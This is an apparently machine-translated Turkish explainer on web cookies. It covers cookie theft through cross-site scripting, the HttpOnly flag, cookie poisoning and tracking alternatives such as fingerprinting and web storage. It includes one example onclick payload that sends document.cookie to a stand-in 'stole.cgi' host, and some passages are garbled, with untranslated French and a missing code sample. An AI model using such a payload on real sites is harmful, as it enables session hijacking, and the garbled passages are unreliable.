Bu tür site içi komut dosyası çalıştırma, genellikle saldırganlar tarafından kullanıcıların HTML içeriği yayınlamasına izin veren sitelerde kullanılır. Saldırgan, uyumlu kodun bir bölümünü HTML katkısına entegre ederek diğer kullanıcılardan tanımlama bilgileri alabilir. Bu çerezlere ilişkin bilgi, çalınan çerezler kullanılarak aynı siteye bağlanılarak kullanılabilir ve böylece çerezleri çalınan kullanıcı olarak tanınır.

Bu tür saldırıları önlemenin bir yolu HttpOnly bayrağını kullanmaktır; bu, PHP'de Internet Explorer'ın 6. sürümünden beri tanıtılan ve tanımlama bilgisini komut dosyasına yakın istemci için erişilemez hale getirmek için planlanan 5.2.0 sürümünden beri sunulan bir seçenektir. Bununla birlikte, web geliştiricileri, sitede komut dosyası oluşturmaya karşı bağışık olmaları için site geliştirmelerinde bunu dikkate almalıdır.

Kullanılan diğer bir güvenlik tehdidi, sitede talep üretimidir.

Resmi teknik şartname, tanımlama bilgilerinin yalnızca kaynaklandıkları etki alanındaki sunuculara geri gönderilmesine izin verir. Ancak çerezlerin değeri, çerez başlıkları dışındaki araçlar kullanılarak diğer sunuculara gönderilebilir.

Özellikle, JavaScript gibi betik dillerinin genellikle çerez değerlerine erişmesine izin verilir ve İnternet üzerindeki herhangi bir sunucuya keyfi değerler gönderme yeteneğine sahiptir. Bu komut dosyası oluşturma özelliği, kullanıcıların diğer kullanıcıların görüntülemesi için HTML içeriği göndermesine izin veren web sitelerinde kullanılır.

Örneğin, example.com etki alanında çalışan bir saldırgan, normalde kontrol etmedikleri popüler bir bloga işaret eden aşağıdaki bağlantıyı içeren bir yorum yayınlayabilir:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Başka bir kullanıcı bu bağlantıya tıkladığında, tarayıcı kodun onclick öznitelik bölümünü yürütür, böylece bu sayfa için etkin olan kullanıcı tanımlama bilgilerinin listesiyle document.cookie dizesini değiştirir. Bu nedenle, bu çerez listesi example.com sunucusuna gönderilir ve bu nedenle saldırgan, bu kullanıcının çerezlerini toplayabilir.

Bu tür bir saldırının kullanıcı tarafında tespit edilmesi zordur çünkü komut dosyası, tanımlama bilgisini ayarlayan aynı etki alanından gelir ve değerleri gönderme işlemi, bu etki alanı tarafından yetkilendirilmiş gibi görünür. Kötü niyetli kodların yayınlanmasını engelleyen kısıtlamaların getirilmesinin bu tür siteleri işleten yöneticilerin sorumluluğunda olduğu düşünülmektedir.

Tanımlama bilgileri, HttpOnly bayrağıyla gönderildiyse, JavaScript gibi istemci tarafı programlara doğrudan görünmez. Sunucunun bakış açısından tek fark, Set-Cookie başlığının satırına HttpOnly dizesini içeren yeni bir alan eklenmesidir:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Tarayıcının böyle bir tanımlama bilgisi aldığında, bunu normal olarak aşağıdaki HTTP alışverişinde kullanması gerekir, ancak bunu istemci tarafında yürütülen komut dosyalarına görünür hale getirmeden. HttpOnly bayrağı herhangi bir resmi teknik spesifikasyonun parçası değildir ve tüm tarayıcılarda uygulanmaz. Şu anda XMLHTTPRequest yöntemiyle oturum çerezlerinin okunmasını ve yazılmasını engellemenin bir yolu olmadığını unutmayın.

İçeriğin değiştirilmesi: Bir saldırgan, muhtemelen sunucu tarafından gönderilen geçerli bir tanımlama bilgisinden yapılan geçersiz bir tanımlama bilgisini sunucuya gönderir.

Çerezleri değiştirme

Çerezlerin saklanması ve değiştirilmeden sunucuya geri gönderilmesi gerektiğinde, bir saldırgan, çerezlerin sunucuya geri gönderilmeden önceki değerini değiştirebilir. Örneğin, bir çerez kullanıcının mağazanın alışveriş sepetine koyduğu ürünler için ödemesi gereken toplam değeri içeriyorsa, bu değeri değiştirmek sunucuyu saldırgandan başlangıç ​​fiyatından daha düşük ücret alma riskine maruz bırakır. Çerezlerin değerini değiştirme işlemine denir kurabiye zehirlenmesi ve çerez hırsızlığından sonra saldırıyı kalıcı kılmak için kullanılabilir.

Çerez geçersiz kılma yönteminde, saldırgan sunucuya geçersiz bir çerez göndermek için bir tarayıcı arızasından yararlanır.

Bununla birlikte, çoğu web sitesi, diğer tüm bilgiler sunucuda depolanırken, çerezin kendisinde yalnızca oturum kimliğini (oturum kullanıcısını tanımlamak için kullanılan rastgele oluşturulmuş benzersiz bir sayı) depolar. Bu durumda, bu sorun büyük ölçüde çözülmüştür.

Web siteleri arasında çerez kullanımı

Her sitenin kendi tanımlama bilgilerine sahip olması beklenir, bu nedenle bir site başka bir siteyle ilişkili tanımlama bilgilerini değiştiremez veya oluşturamaz. Bir web tarayıcı güvenlik kusuru, kötü niyetli sitelerin bu kuralı çiğnemesine izin verebilir. Böyle bir kusurun kullanılmasına genellikle şu ad verilir: siteler arası pişirme. Bu tür saldırıların amacı, oturum kimliği hırsızlığı olabilir.

Kullanıcılar, bu güvenlik açıklarının neredeyse ortadan kaldırıldığı web tarayıcılarının en son sürümlerini kullanmalıdır.

İstemci ve sunucu arasında çakışan durum

Tanımlama bilgilerinin kullanımı, müşterinin durumu ile tanımlama bilgisinde saklanan durum arasında bir çelişki oluşturabilir. Kullanıcı bir tanımlama bilgisi edinir ve tarayıcının "Geri" düğmesine tıklarsa, tarayıcının durumu genellikle bu edinmeden önceki durumla aynı değildir. Örneğin, bir çevrimiçi mağazanın sepeti tanımlama bilgileri kullanılarak oluşturulmuşsa, kullanıcı tarayıcı geçmişine döndüğünde sepetin içeriği değiştirilemez: kullanıcı sepetine bir makale eklemek için bir düğmeye basar ve "Geri Dön" düğmesini tıklarsa " düğmesi, makale bunda kalır. Bu, makalenin eklenmesini kesinlikle iptal etmek isteyen kullanıcının niyeti olmayabilir. Bu güvenilmezliğe, karışıklığa ve hatalara yol açabilir. Bu nedenle, web geliştiricileri bu sorunun farkında olmalı ve bu gibi durumlarla başa çıkmak için önlemler uygulamalıdır.

Çerez süresi dolmuş

Kalıcı tanımlama bilgileri, gizlilik güvenliği uzmanları tarafından yeterince yakında sona ermeyecek şekilde ayarlanmadığı ve bu nedenle web sitelerinin kullanıcıları izlemesine ve zaman içinde profillerini oluşturmasına izin verdiği için eleştirildi. Çerezlerin bu yönü, aynı zamanda oturum ele geçirme sorununun bir parçasıdır çünkü çalınan kalıcı bir çerez, bir kullanıcıyı uzun bir süre taklit etmek için kullanılabilir.

Ayrıca Oku: GAFAM: onlar kim? Neden (bazen) bu kadar korkutucular?

Çerezlere alternatifler

Çerezler kullanılarak gerçekleştirilebilen bazı işlemler, çerezleri atlayan veya silinmiş çerezleri yeniden oluşturan diğer mekanizmalar kullanılarak da gerçekleştirilebilir, bu da çerezlerle aynı şekilde (veya bazen görünmez olduğu için daha kötü) gizlilik sorunları yaratır.

IP adresi

Kullanıcılar, sayfayı çağıran bilgisayarın IP adresi ile takip edilebilir. Bu teknik, World Wide Web'in tanıtılmasından bu yana kullanılmaktadır, sayfalar indirilirken sunucu, tarayıcı veya proxy çalıştıran bilgisayarın IP adresini (hiçbiri kullanılmıyorsa) ister. Sunucu, kullanımda çerez olup olmadığını bu bilgileri izleyebilir. Ancak, bilgisayarlar ve proxy'ler birden fazla kullanıcı tarafından paylaşılabileceğinden ve aynı bilgisayar her çalışma oturumunda farklı bir IP adresi alabileceğinden (telefon bağlantılarında sıklıkla olduğu gibi), bu adresler genellikle bir kullanıcıyı tanımlamada tanımlama bilgilerinden daha az güvenilirdir. .

IP adreslerine göre izleme, güç açık olduğu sürece aynı IP adresini uzun süre koruyan geniş bant bağlantılar gibi bazı durumlarda güvenilir olabilir.

Tor gibi bazı sistemler, İnternet'in anonimliğini korumak ve IP adresine göre izlemeyi imkansız veya kullanışsız hale getirmek için tasarlanmıştır.

URL

Daha kesin bir teknik, bilgilerin URL'lere gömülmesine dayanır. URL'nin sorgu dizesi kısmı, genellikle bu amaç için kullanılan bir tekniktir, ancak diğer kısımlar da kullanılabilir. Çerezler etkinleştirilmemişse, hem Java sunucu uygulaması hem de PHP oturum mekanizmaları bu yöntemi kullanır.

Bu yöntem, web sunucusunun, tarayıcıya gönderildiğinde onu taşıyan web sayfasının bağlantılarına dize istekleri eklemesini içerir. Kullanıcı bir bağlantıyı takip ettiğinde, tarayıcı ekli sorgu dizesini sunucuya döndürür.

Bu amaçla kullanılan sorgu dizileri ve tanımlama bilgileri çok benzerdir, her ikisi de sunucu tarafından isteğe bağlı olarak seçilen ve tarayıcı tarafından döndürülen bilgilerdir. Ancak bazı farklılıklar vardır: Sorgu dizesi içeren bir URL yeniden kullanıldığında sunucuya aynı bilgiler gönderilir. Örneğin, bir kullanıcının tercihleri ​​bir URL'nin sorgu dizesinde kodlanmışsa ve kullanıcı bu URL'yi başka bir kullanıcıya e-posta yoluyla gönderirse, o kullanıcı da bu tercihleri ​​kullanabilecektir.

Öte yandan, bir kullanıcı aynı sayfaya iki kez eriştiğinde, aynı sorgu dizesinin her iki seferde de kullanılacağının garantisi yoktur. Örneğin, bir kullanıcı dahili bir site sayfasından bir sayfaya ilk kez gelir ve harici bir sayfadan aynı sayfaya ikinci kez giderse, site sayfasına göre sorgu dizesi genellikle farklıdır, tanımlama bilgileri ise aynıdır .

Sorgu dizelerinin diğer dezavantajları güvenlikle ilgilidir: bir oturumu tanımlayan verileri sorgu dizelerinde tutmak, oturum sabitleme saldırılarını, tanımlayıcı referans saldırılarını ve diğer istismarları etkinleştirir veya basitleştirir. Oturum kimliklerini HTTP tanımlama bilgileri olarak iletmek daha güvenlidir.

Gizli form alanı

ASP.NET tarafından kullanılan bir oturum izleme biçimi, web formlarını gizli alanlarla kullanmaktır. Bu teknik, bilgi taşımak için URL sorgu dizelerini kullanmaya çok benzer ve aynı avantaj ve dezavantajlara sahiptir; ve form HTTP GET yöntemiyle işlenirse, alanlar aslında formu gönderirken gönderecek olan tarayıcının URL'sinin bir parçası haline gelir. Ancak çoğu form, gizli alanlar da dahil olmak üzere form bilgilerinin ne URL'nin parçası ne de tanımlama bilgisi olmayan ek bir girdi olarak eklenmesine neden olan HTTP POST ile işlenir.

Bu yaklaşımın izleme açısından iki avantajı vardır: birincisi, URL yerine HTML kaynak koduna ve POST girişine yerleştirilen bilgilerin izlenmesi, ortalama bir kullanıcının bu izlemeden kaçınmasına olanak tanır; ikincisi, kullanıcı URL'yi kopyaladığında (örneğin, sayfayı diske kaydetmek veya e-postayla göndermek için) oturum bilgileri kopyalanmaz.

pencere.adı

Tüm yaygın web tarayıcıları, DOM'un window.name özelliğini kullanarak JavaScript aracılığıyla oldukça büyük miktarda veri (2MB ila 32MB) depolayabilir. Bu veriler, oturum çerezleri yerine kullanılabilir ve etki alanları arasında da kullanılır. Teknik, karmaşık bir istemci tarafı oturum değişkenleri kümesini depolamak için JSON nesneleriyle birleştirilebilir.

Dezavantajı, her ayrı pencere veya sekmenin başlangıçta boş bir pencere.adı olmasıdır; sekmelere göre gezinirken (kullanıcı tarafından açılır), bu, ayrı ayrı açılan sekmelerin bir pencere adına sahip olmayacağı anlamına gelir. Ayrıca window.name, farklı sitelerdeki ziyaretçileri izlemek için kullanılabilir ve bu da bir gizlilik sorunu oluşturabilir.

Bazı açılardan bu, sunucunun müdahale etmemesi nedeniyle tanımlama bilgilerinden daha güvenli olabilir, bu nedenle algılayıcı tanımlama bilgilerinin ağ saldırılarına karşı savunmasız hale getirir. Ancak, verileri korumak için özel önlemler alınırsa, aynı pencerede açılan diğer siteler aracılığıyla verilere erişilebildiğinden, sonraki saldırılara karşı savunmasızdır.

HTTP kimlik doğrulaması

HTTP protokolü, temel erişim kimlik doğrulama protokollerini ve yalnızca kullanıcı kullanıcı adını ve parolayı verdiğinde bir web sayfasına erişime izin veren erişim kimlik doğrulama özetini içerir. Sunucu bir web sayfasına erişim izni vermek için bir sertifika isterse, tarayıcı bunu kullanıcıdan ister ve aldıktan sonra, tarayıcı bunu saklar ve sonraki tüm HTTP isteklerinde gönderir. Bu bilgiler kullanıcıyı izlemek için kullanılabilir.

Yerel paylaşılan nesne

Bir tarayıcı Adobe Flash Player eklentisini içeriyorsa, yerel paylaşılan nesneler çerezlerle aynı amaçla kullanılabilir. Web geliştiricileri için çekici bir seçim olabilirler çünkü:

• yerel paylaşılan bir nesne için varsayılan boyut sınırı 100 KB'dir;
• güvenlik denetimleri, kullanıcı tanımlama bilgisi denetimlerinden ayrıdır (bu nedenle, tanımlama bilgileri olmadığında yerel paylaşılan nesnelere izin verilebilir).

Çerez yönetimi politikasını Adobe'nin yerel paylaşılan nesnelerinden ayıran bu son nokta soruları gündeme getirir Kullanıcı tarafından gizlilik ayarlarının yönetimi ile ilgili olarak: Çerez yönetiminin yerel paylaşılan nesnelerin yönetimi üzerinde hiçbir etkisi olmadığının ve bunun tersinin de geçerli olduğunun farkında olmalıdır.

Bu sisteme yöneltilen bir başka eleştiri de, bir web standardı olmayıp, yalnızca tescilli olan Adobe Flash Player eklentisi üzerinden kullanılabilmesidir.

İstemci tarafı kalıcılığı

Bazı web tarayıcıları, sayfanın bilgileri daha sonra kullanmak üzere yerel olarak depolamasına izin veren komut dosyası tabanlı bir kalıcılık mekanizmasını destekler. Örneğin Internet Explorer, tarayıcı geçmişindeki, yer imlerindeki, XML'de depolanan bir biçimde veya doğrudan diske kaydedilmiş bir web sayfasındaki kalıcı bilgileri destekler. Microsoft Internet Explorer 5 için, DHTML davranışları aracılığıyla kullanılabilen bir kullanıcı verisi yöntemi vardır.

W3C, HTML 5'te istemci tarafı veri depolama için Web depolama adı verilen yeni bir JavaScript API'sini tanıttı ve tanımlama bilgilerini kalıcı olarak değiştirmeyi amaçladı. Çerezlere benzer, ancak büyük ölçüde geliştirilmiş kapasiteye sahiptir ve HTTP isteklerinin başlığında bilgi depolamaz. API, iki tür web depolamaya izin verir: kalıcı tanımlama bilgilerine ve oturum tanımlama bilgilerine benzer şekilde yerel depolama ve oturum depolama oturum depolama sırasıyla sekme kapatıldığında sona erer). Web depolama Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 ve Opera 10.50 tarafından desteklenmektedir.

Normalde farklı bir mekanizma, web sayfalarında JavaScript programlarını kullanarak tarayıcı önbelleğine (yenilemek yerine bellekte) dayanır. 

Örneğin, bir sayfa şu etiketi içerebilir: . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Bu noktada program önbellekte kalır ve ziyaret edilen sayfa ikinci kez yeniden yüklenmez. Sonuç olarak, program global bir değişken içeriyorsa (örneğin var id = 3243242;), bu tanımlayıcı geçerliliğini korur ve sayfa yeniden yüklendiğinde veya programı bağlayan bir sayfa yüklendiğinde diğer JavaScript kodları tarafından kullanılabilir. 

Bu yöntemin en büyük dezavantajı, JavaScript global değişkeninin statik olması gerektiğidir, yani bir tanımlama bilgisi gibi değiştirilemez veya silinemez.

web tarayıcı parmak izi

Tarayıcı parmak izi, tanımlama amacıyla bir tarayıcının yapılandırma ayarları hakkında toplanan bilgilerdir. Bu parmak izleri, çerezler devre dışı bırakıldığında bile bir İnternet kullanıcısını veya bir cihazı tamamen veya kısmen tanımlamak için kullanılabilir.

Temel web tarayıcısı yapılandırma bilgileri, insan web trafiğini doğru bir şekilde ölçmek ve çeşitli tıklama sahtekarlığını tespit etmek amacıyla web sitesi izleyici hizmetleri tarafından uzun süredir toplanmaktadır. İstemci taraflı betik dillerinin yardımıyla, çok daha doğru bilgi toplama şimdi mümkün.

Bu bilgiyi bir bit dizisine dönüştürmek, bir aygıt parmak izi üretir. 2010 yılında Electronic Frontier Foundation (EFF), bir tarayıcının parmak izinin entropisini en az 18,1 bitve bu, kanvas parmak izi almadaki ilerlemelerin bu entropiye 5,7 bit eklemesinden önceydi.

Kısaca Çerezler

Tanımlama bilgileri, web tarayıcısı tarafından bir web sitesi ziyaretçisinin sabit diskinde saklanan ve (diğer şeylerin yanı sıra) ziyaretçi veya sitedeki yolculuğu hakkında bilgileri kaydetmek için kullanılan küçük metin dosyalarıdır. Web yöneticisi böylece bir ziyaretçinin alışkanlıklarını tanıyabilir ve sitesinin sunumunu her ziyaretçi için kişiselleştirebilir; çerezler daha sonra ana sayfada kaç makalenin gösterileceğini hatırlamayı veya hatta herhangi bir özel taraf için oturum açma kimlik bilgilerini tutmayı mümkün kılar: ziyaretçi siteye geri döndüğünde, artık adını ve şifresini girmesine gerek yoktur. Tanımlama bilgisinde otomatik olarak okundukları için tanınırlar.

Bir çerezin, site tasarımcısı tarafından belirlenen sınırlı bir ömrü vardır. Ayrıca, tarayıcının kapanmasına karşılık gelen sitedeki oturumun sonunda da geçerliliğini yitirebilirler. Çerezler, ziyaretçilerin hayatını kolaylaştırmak ve onlara daha alakalı bilgiler sunmak için yaygın olarak kullanılmaktadır. Ancak özel teknikler, bir ziyaretçiyi birkaç sitede takip etmeyi ve böylece alışkanlıkları hakkında çok kapsamlı bilgi toplamayı ve çapraz kontrol etmeyi mümkün kılar. Bu yöntem çerez kullanımına ziyaretçilerin mahremiyetini ihlal eden bir gözetleme tekniği olarak ün kazandırmıştır ki bu teknik olmayan nedenlerle veya kullanıcı beklentilerine saygı gösterilmeden yapılan birçok kullanımda ne yazık ki gerçeğe karşılık gelmektedir.

Bu meşru korkulara yanıt olarak, HTML 5, çerezlerin yerini almayı amaçlayan, çok daha güvenli ve daha yüksek kapasiteli, Web depolama adı verilen istemci tarafı veri depolaması için yeni bir JavaScript API sunar.

Çerezlerin saklanması

Bazı tarayıcılarda bir çerez kolayca düzenlenebilir, Notepad gibi basit bir metin düzenleyici, değerlerini manuel olarak değiştirmek için yeterlidir.

Çerezler, tarayıcıya bağlı olarak farklı şekilde kaydedilir:

• Microsoft Internet Explorer her çerezi farklı bir dosyaya kaydeder;
• Mozilla Firefox tüm tanımlama bilgilerini tek bir dosyaya kaydeder;
• Opera tüm çerezlerini tek bir dosyaya kaydeder ve şifreler (yazılım seçenekleri dışında değiştirilemez);
• Apple Safari tüm tanımlama bilgilerini tek bir .plist uzantılı dosyaya kaydeder. Yazılım seçeneklerini gözden geçirmediğiniz sürece değişiklik yapmak mümkündür ancak çok kolay değildir.

Tarayıcıların desteklenmesi gerekir en azından :

• 300 eşzamanlı çerez;
• Çerez başına 4 o;
• Ana bilgisayar veya etki alanı başına 20 çerez.